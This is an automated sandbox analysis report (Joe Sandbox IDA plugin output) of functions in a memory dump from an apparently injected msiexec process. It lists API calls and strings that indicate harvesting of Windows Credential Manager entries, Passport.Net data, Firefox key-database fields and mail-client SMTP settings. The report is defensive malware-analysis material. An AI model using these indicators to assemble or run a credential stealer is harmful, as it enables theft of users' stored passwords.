                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                                                                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                      APIs
                                                                                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                      • String ID: global-salt$password-check
                                                                                                                                                      • API String ID: 231171946-3927197501
                                                                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                      APIs
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                      • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                      APIs
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                      • String ID: Passport.Net\*
                                                                                                                                                      • API String ID: 2329438634-3671122194
                                                                                                                                                      • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                      • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                      • String ID: Personalities
                                                                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                                                                      • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                      • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: H
                                                                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                                                                      • API String ID: 438689982-3457389245
                                                                                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID: winRead
                                                                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID: gj
                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                      APIs
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1189762176-0
                                                                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                      APIs
                                                                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2775283111-0
                                                                                                                                                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                      APIs
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                                                                      • String ID: smtp
                                                                                                                                                      • API String ID: 2625860049-60245459
                                                                                                                                                      • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                      • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                                                                      • String ID: S_@$l
                                                                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                                                                      • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                      • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004092C0
                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                      Strings
                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                      • API String ID: 408644273-3424043681
                                                                                                                                                      • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                      • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                      • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                      • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                      • String ID: C^@$X$ini
                                                                                                                                                      • API String ID: 714388716-917056472
                                                                                                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                      • API String ID: 3492281209-168460110
